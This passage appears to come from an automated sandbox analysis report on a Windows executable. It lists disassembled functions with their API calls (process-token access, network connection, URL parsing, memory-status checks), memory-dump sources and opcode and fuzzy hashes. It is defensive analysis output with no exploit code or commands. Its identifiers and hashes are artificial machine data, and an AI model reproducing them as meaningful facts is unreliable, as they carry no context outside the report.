                                                                                                                    • Instruction ID: 3fe709e5dd9d585e54c0821f5484d89fc21ee1b1dce03ea4e55748104e2a9eb8
                                                                                                                    • Opcode Fuzzy Hash: 68d9d046eaace5241d4219e4ddec734d313abdbe7da63d9bab43a297efa3694b
                                                                                                                    • Instruction Fuzzy Hash: C1F0543A100100ABCF066F55DCC5E8ABB29EF49320F088061FE089E267C771E851CBB4
                                                                                                                    Function 002B2218 Relevance: 6.0, APIs: 4, Instructions: 23COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    • GetSysColor.USER32(00000008), ref: 002B2231
                                                                                                                    • SetTextColor.GDI32(?,000000FF), ref: 002B223B
                                                                                                                    • SetBkMode.GDI32(?,00000001), ref: 002B2250
                                                                                                                    • GetStockObject.GDI32(00000005), ref: 002B2258
                                                                                                                    • GetWindowDC.USER32(?,00000000), ref: 002EBE83
                                                                                                                    • GetPixel.GDI32(00000000,00000000,00000000), ref: 002EBE90
                                                                                                                    • GetPixel.GDI32(00000000,?,00000000), ref: 002EBEA9
                                                                                                                    • GetPixel.GDI32(00000000,00000000,?), ref: 002EBEC2
                                                                                                                    • GetPixel.GDI32(00000000,?,?), ref: 002EBEE2
                                                                                                                    • ReleaseDC.USER32(?,00000000), ref: 002EBEED
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.2093337129.00000000002B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002B0000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.2093280237.00000000002B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2093420472.000000000033F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2093420472.0000000000364000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2093476420.000000000036E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2093514337.0000000000377000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_2b0000_6BRa130JDj.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: Pixel$Color$ModeObjectReleaseStockTextWindow
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 1946975507-0
                                                                                                                    • Opcode ID: c844055125d1402d838961265bc3cbd241e63b138d2b0df60e2af51bc17699d7
                                                                                                                    • Instruction ID: efd9cb06918fdac9bf9ce41756e5c508b3a2197f5079bbba1cb1eed03a75cfcf
                                                                                                                    • Opcode Fuzzy Hash: c844055125d1402d838961265bc3cbd241e63b138d2b0df60e2af51bc17699d7
                                                                                                                    • Instruction Fuzzy Hash: 88E03031954245EEDF225F64FC4D7D83B14EB15332F448366FA69480E187714590DB11
                                                                                                                    Function 00308712 Relevance: 6.0, APIs: 4, Instructions: 23threadCOMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    • GetCurrentThread.KERNEL32 ref: 0030871B
                                                                                                                    • OpenThreadToken.ADVAPI32(00000000,?,?,?,003082E6), ref: 00308722
                                                                                                                    • GetCurrentProcess.KERNEL32(00000028,?,?,?,?,003082E6), ref: 0030872F
                                                                                                                    • OpenProcessToken.ADVAPI32(00000000,?,?,?,003082E6), ref: 00308736
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.2093337129.00000000002B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002B0000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.2093280237.00000000002B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2093420472.000000000033F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2093420472.0000000000364000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2093476420.000000000036E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2093514337.0000000000377000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_2b0000_6BRa130JDj.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: CurrentOpenProcessThreadToken
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 3974789173-0
                                                                                                                    • Opcode ID: 27ffca1d965619e1a568e2b30ae27b0fa6c0f97e07b115baaba9d52f26aa1624
                                                                                                                    • Instruction ID: f5e4a1e367ae0d3a27a79276afebf36d0270fc40249ae21402b418213f7c3ff3
                                                                                                                    • Opcode Fuzzy Hash: 27ffca1d965619e1a568e2b30ae27b0fa6c0f97e07b115baaba9d52f26aa1624
                                                                                                                    • Instruction Fuzzy Hash: F1E08636A122119FD7215FB49D4CB573BACEF50B91F554828B2C5C9091DB348441C750
                                                                                                                    Function 002B6240 Relevance: 5.6, APIs: 2, Strings: 1, Instructions: 317COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.2093337129.00000000002B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002B0000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.2093280237.00000000002B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2093420472.000000000033F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2093420472.0000000000364000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2093476420.000000000036E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2093514337.0000000000377000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_2b0000_6BRa130JDj.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID: %4
                                                                                                                    • API String ID: 0-762753230
                                                                                                                    • Opcode ID: be3739095bd1d399410d330d81e6f69422a01a813b49ef6ec2ca3a710a118fd0
                                                                                                                    • Instruction ID: 3d02f00984564045611ebd9b6d01381caeb44dced5fde81cd9756c9b76ffb174
                                                                                                                    • Opcode Fuzzy Hash: be3739095bd1d399410d330d81e6f69422a01a813b49ef6ec2ca3a710a118fd0
                                                                                                                    • Instruction Fuzzy Hash: 88B12B71C2010ADBCF24EF94C489AFDB7B8FF44390F544166E905A7191DB789EA1CB51
                                                                                                                    Function 0032AEA2 Relevance: 5.6, APIs: 1, Strings: 2, Instructions: 313COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.2093337129.00000000002B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002B0000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.2093280237.00000000002B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2093420472.000000000033F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2093420472.0000000000364000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2093476420.000000000036E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2093514337.0000000000377000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_2b0000_6BRa130JDj.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: __itow_s
                                                                                                                    • String ID: xb7$xb7
                                                                                                                    • API String ID: 3653519197-2383554142
                                                                                                                    • Opcode ID: c15cf06b45bee8e28d83594c1f726054db681ee9194abf8f5265653dbe846437
                                                                                                                    • Instruction ID: a6cbfc13b05add55d6296cf631575bad6894dc1a09883a3c62e09165fb7762a5
                                                                                                                    • Opcode Fuzzy Hash: c15cf06b45bee8e28d83594c1f726054db681ee9194abf8f5265653dbe846437
                                                                                                                    • Instruction Fuzzy Hash: 6FB17F70A00219EFCB25DF54D891EFABBB9FF58340F14845AF9459B252EB30E991CB60
                                                                                                                    Function 0031AFAC Relevance: 5.5, APIs: 2, Strings: 1, Instructions: 201shareCOMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                      • Part of subcall function 002CFC86: _wcscpy.LIBCMT ref: 002CFCA9
                                                                                                                      • Part of subcall function 002B9837: __itow.LIBCMT ref: 002B9862
                                                                                                                      • Part of subcall function 002B9837: __swprintf.LIBCMT ref: 002B98AC
                                                                                                                    • __wcsnicmp.LIBCMT ref: 0031B02D
                                                                                                                    • WNetUseConnectionW.MPR(00000000,?,?,00000000,?,?,00000100,?), ref: 0031B0F6
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.2093337129.00000000002B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002B0000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.2093280237.00000000002B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2093420472.000000000033F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2093420472.0000000000364000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2093476420.000000000036E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2093514337.0000000000377000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_2b0000_6BRa130JDj.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: Connection__itow__swprintf__wcsnicmp_wcscpy
                                                                                                                    • String ID: LPT
                                                                                                                    • API String ID: 3222508074-1350329615
                                                                                                                    • Opcode ID: f9f65fcc3db86934feea12cb5aa155a61b56e1ac9bae3d9177da95a52cc584d1
                                                                                                                    • Instruction ID: 10ef548da22d7f0332e416178a79a1609403cde75d35f8d3c69eeb4070b0a996
                                                                                                                    • Opcode Fuzzy Hash: f9f65fcc3db86934feea12cb5aa155a61b56e1ac9bae3d9177da95a52cc584d1
                                                                                                                    • Instruction Fuzzy Hash: A5617175A10215AFCB19DF94C891EEEF7B9EF0C310F118169F916AB2A1D770AE80CB50
                                                                                                                    Function 002C2957 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 144sleepCOMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    • Sleep.KERNEL32(00000000), ref: 002C2968
                                                                                                                    • GlobalMemoryStatusEx.KERNEL32(?), ref: 002C2981
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.2093337129.00000000002B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002B0000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.2093280237.00000000002B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2093420472.000000000033F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2093420472.0000000000364000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2093476420.000000000036E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2093514337.0000000000377000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_2b0000_6BRa130JDj.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: GlobalMemorySleepStatus
                                                                                                                    • String ID: @
                                                                                                                    • API String ID: 2783356886-2766056989
                                                                                                                    • Opcode ID: 7b554210f9803daa2cd3afbf75bb85f879f4897b5b5f2393c94f8e51b6e9739f
                                                                                                                    • Instruction ID: 55abe9ee8977310c2bd1f68ea015d6864306ed48c0aaf0be61af8ed83d0103ae
                                                                                                                    • Opcode Fuzzy Hash: 7b554210f9803daa2cd3afbf75bb85f879f4897b5b5f2393c94f8e51b6e9739f
                                                                                                                    • Instruction Fuzzy Hash: DA5134724287449BD320EF10D886BEBBBECFB85385F81885DF2D8410A1DB319579CB66
                                                                                                                    Function 00319734 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 138COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                      • Part of subcall function 002B4F0B: __fread_nolock.LIBCMT ref: 002B4F29
                                                                                                                    • _wcscmp.LIBCMT ref: 00319824
                                                                                                                    • _wcscmp.LIBCMT ref: 00319837
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.2093337129.00000000002B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002B0000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.2093280237.00000000002B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2093420472.000000000033F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2093420472.0000000000364000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2093476420.000000000036E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2093514337.0000000000377000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_2b0000_6BRa130JDj.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: _wcscmp$__fread_nolock
                                                                                                                    • String ID: FILE
                                                                                                                    • API String ID: 4029003684-3121273764
                                                                                                                    • Opcode ID: 6a4edb2c2243d89e8d8ea38b3e15a108ddb302b8fd5ebb790160d2855bb0574c
                                                                                                                    • Instruction ID: 650c519a8f812517a6a7fc66caf9c644a83c41d8506bd9a12c5a56a3532882c3
                                                                                                                    • Opcode Fuzzy Hash: 6a4edb2c2243d89e8d8ea38b3e15a108ddb302b8fd5ebb790160d2855bb0574c
                                                                                                                    • Instruction Fuzzy Hash: C741D871A00209BADF25AFA0CC85FEFB7BDDF89750F01047AF904B7281DA71A9548B61
                                                                                                                    Function 002F0574 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 115COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.2093337129.00000000002B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002B0000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.2093280237.00000000002B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2093420472.000000000033F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2093420472.0000000000364000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2093476420.000000000036E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2093514337.0000000000377000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_2b0000_6BRa130JDj.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: ClearVariant
                                                                                                                    • String ID: Dd7$Dd7
                                                                                                                    • API String ID: 1473721057-1285796119
                                                                                                                    • Opcode ID: 2d5515199060b79896e45efb07429c091b7ed25f1b53f6a3577422397052c5c6
                                                                                                                    • Instruction ID: c6da1e9b1a6fe84f952e850753e3c589df07fad111cd0c983b5e509d6648d01a
                                                                                                                    • Opcode Fuzzy Hash: 2d5515199060b79896e45efb07429c091b7ed25f1b53f6a3577422397052c5c6
                                                                                                                    • Instruction Fuzzy Hash: 075105786283429FD764CF19C490A6ABBF1FB99394F54885DE9898B321D331EC91CF42
                                                                                                                    Function 0032258E Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 97networkCOMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    • _memset.LIBCMT ref: 0032259E
                                                                                                                    • InternetCrackUrlW.WININET(?,00000000,00000000,0000007C), ref: 003225D4
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.2093337129.00000000002B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002B0000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.2093280237.00000000002B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2093420472.000000000033F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2093420472.0000000000364000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2093476420.000000000036E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2093514337.0000000000377000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_2b0000_6BRa130JDj.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: CrackInternet_memset
                                                                                                                    • String ID: |
                                                                                                                    • API String ID: 1413715105-2343686810
                                                                                                                    • Opcode ID: 4d983a563f2dcf962c6bf59ab88e8eb9d2491e9c2931a74f880b5d154f7952e5
                                                                                                                    • Instruction ID: 3d44386bae5ed88cc75c4fa9239a1f186cd123c23d1996a38b473b4befb34f58
                                                                                                                    • Opcode Fuzzy Hash: 4d983a563f2dcf962c6bf59ab88e8eb9d2491e9c2931a74f880b5d154f7952e5
                                                                                                                    • Instruction Fuzzy Hash: 0A31F671C10119EBDF01EFA1DC85EEEBFB9FF08350F140069E915A6162EA315966EFA0
                                                                                                                    Function 00337A71 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 97windowCOMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    • SendMessageW.USER32(?,00001132,00000000,?), ref: 00337B61
                                                                                                                    • SendMessageW.USER32(?,00001105,00000000,00000000), ref: 00337B76
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.2093337129.00000000002B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002B0000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.2093280237.00000000002B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2093420472.000000000033F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2093420472.0000000000364000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2093476420.000000000036E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2093514337.0000000000377000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_2b0000_6BRa130JDj.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: MessageSend
                                                                                                                    • String ID: '
                                                                                                                    • API String ID: 3850602802-1997036262
                                                                                                                    • Opcode ID: 4d1e2316733407a9a0140f27846724a066e86b0c9b8467fcc807688d433efe09
                                                                                                                    • Instruction ID: 6bddcbeeaa8f40c895dfcc01af6d16f1020e7bc6f9b14a198954727ab42e6ce9
                                                                                                                    • Opcode Fuzzy Hash: 4d1e2316733407a9a0140f27846724a066e86b0c9b8467fcc807688d433efe09
                                                                                                                    • Instruction Fuzzy Hash: 8941F8B4A0520AAFDB25CF64C9C1BDABBB9FB09300F15016AE909EB351D770A951CF90
                                                                                                                    Function 00336A63 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 95COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    • DestroyWindow.USER32(?,?,?,?), ref: 00336B17
                                                                                                                    • MoveWindow.USER32(?,?,?,?,?,00000001,?,?,?), ref: 00336B53
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.2093337129.00000000002B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002B0000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.2093280237.00000000002B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2093420472.000000000033F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2093420472.0000000000364000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2093476420.000000000036E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2093514337.0000000000377000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_2b0000_6BRa130JDj.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: Window$DestroyMove
                                                                                                                    • String ID: static
                                                                                                                    • API String ID: 2139405536-2160076837
                                                                                                                    • Opcode ID: 19d1b62de3b20a077aa3c9bdbdec27883fac652e0d5cfd1e07e0b664816bf1e2
                                                                                                                    • Instruction ID: 7e1a5625b4a146e3dde4f74a0e17076d3b8f2ca5af851899af075aa9383428da
                                                                                                                    • Opcode Fuzzy Hash: 19d1b62de3b20a077aa3c9bdbdec27883fac652e0d5cfd1e07e0b664816bf1e2
                                                                                                                    • Instruction Fuzzy Hash: 74319E71210604AEEB129F65CC81BFBB3ADFF48760F11C619F9A9D7190DA30AC91CB60
                                                                                                                    Function 003128A2 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 88windowCOMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    • _memset.LIBCMT ref: 00312911
                                                                                                                    • GetMenuItemInfoW.USER32(?,?,00000000,00000030), ref: 0031294C
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.2093337129.00000000002B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002B0000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.2093280237.00000000002B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2093420472.000000000033F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2093420472.0000000000364000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2093476420.000000000036E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2093514337.0000000000377000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_2b0000_6BRa130JDj.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: InfoItemMenu_memset
                                                                                                                    • String ID: 0
                                                                                                                    • API String ID: 2223754486-4108050209
                                                                                                                    • Opcode ID: 3012e317915f8ceb97a7fc4b0449ca20eca1a55b6657589f104053511be74e0e
                                                                                                                    • Instruction ID: 88cf994c4b17221eedc7ac216d3d8be20b8a06678827577ec29ec15c3d04c766
                                                                                                                    • Opcode Fuzzy Hash: 3012e317915f8ceb97a7fc4b0449ca20eca1a55b6657589f104053511be74e0e
                                                                                                                    • Instruction Fuzzy Hash: D531C331A003059FEB2ECF5CC885BEFBBB9EF49350F151029E985A61A0D77099B4CB51
                                                                                                                    Function 003366D4 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 72windowCOMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    • SendMessageW.USER32(00000000,00000143,00000000,?), ref: 00336761
                                                                                                                    • SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 0033676C
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.2093337129.00000000002B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002B0000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.2093280237.00000000002B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2093420472.000000000033F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2093420472.0000000000364000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2093476420.000000000036E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2093514337.0000000000377000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_2b0000_6BRa130JDj.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: MessageSend
                                                                                                                    • String ID: Combobox
                                                                                                                    • API String ID: 3850602802-2096851135
                                                                                                                    • Opcode ID: 968eb734cacb65802b7c54b6b91c0e793a4c6399a91a42dca09554608133b9df
                                                                                                                    • Instruction ID: a91e5cf3855e5d3881c5d4f58545375a82d88da44cd8645be5bd8b8746c9768c
                                                                                                                    • Opcode Fuzzy Hash: 968eb734cacb65802b7c54b6b91c0e793a4c6399a91a42dca09554608133b9df
                                                                                                                    • Instruction Fuzzy Hash: C011B271210208BFEF268F54CCC2EEB376EEB493A8F518129F91897290D671DC5187A0
                                                                                                                    Function 00336C07 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 68COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                      • Part of subcall function 002B1D35: CreateWindowExW.USER32(?,?,?,?,?,?,?,?,?,?,00000000,00000096), ref: 002B1D73
                                                                                                                      • Part of subcall function 002B1D35: GetStockObject.GDI32(00000011), ref: 002B1D87
                                                                                                                      • Part of subcall function 002B1D35: SendMessageW.USER32(00000000,00000030,00000000), ref: 002B1D91
                                                                                                                    • GetWindowRect.USER32(00000000,?), ref: 00336C71
                                                                                                                    • GetSysColor.USER32(00000012), ref: 00336C8B
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.2093337129.00000000002B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002B0000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.2093280237.00000000002B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2093420472.000000000033F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2093420472.0000000000364000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2093476420.000000000036E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2093514337.0000000000377000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_2b0000_6BRa130JDj.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: Window$ColorCreateMessageObjectRectSendStock
                                                                                                                    • String ID: static
                                                                                                                    • API String ID: 1983116058-2160076837
                                                                                                                    • Opcode ID: ecea4dc390c441b89b03c3facc7f048f3408199e5dcda03dd31f99b1afaf8953
                                                                                                                    • Instruction ID: 8ffce847a74aadcbf27ae5b27269da9301a91c39acccd977262e5e2c5534bc5a
                                                                                                                    • Opcode Fuzzy Hash: ecea4dc390c441b89b03c3facc7f048f3408199e5dcda03dd31f99b1afaf8953
                                                                                                                    • Instruction Fuzzy Hash: 28212C72910209AFDF05DFA8CC86EEA7BA8FB08314F015629F955D2250D735E850DB60
                                                                                                                    Function 00336920 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 64windowCOMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    • GetWindowTextLengthW.USER32(00000000), ref: 003369A2
                                                                                                                    • SendMessageW.USER32(?,000000B1,00000000,00000000), ref: 003369B1
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.2093337129.00000000002B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002B0000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.2093280237.00000000002B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2093420472.000000000033F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2093420472.0000000000364000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2093476420.000000000036E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2093514337.0000000000377000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_2b0000_6BRa130JDj.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: LengthMessageSendTextWindow
                                                                                                                    • String ID: edit
                                                                                                                    • API String ID: 2978978980-2167791130
                                                                                                                    • Opcode ID: f9450eb33af22b0b2e9dab4b6fc6e1c659709b1fc34f383df6643e799559cfa3
                                                                                                                    • Instruction ID: 1c69237e56a22d30a166180cc9e380d19c902cb5dd3bf139aa22a754762d9f34
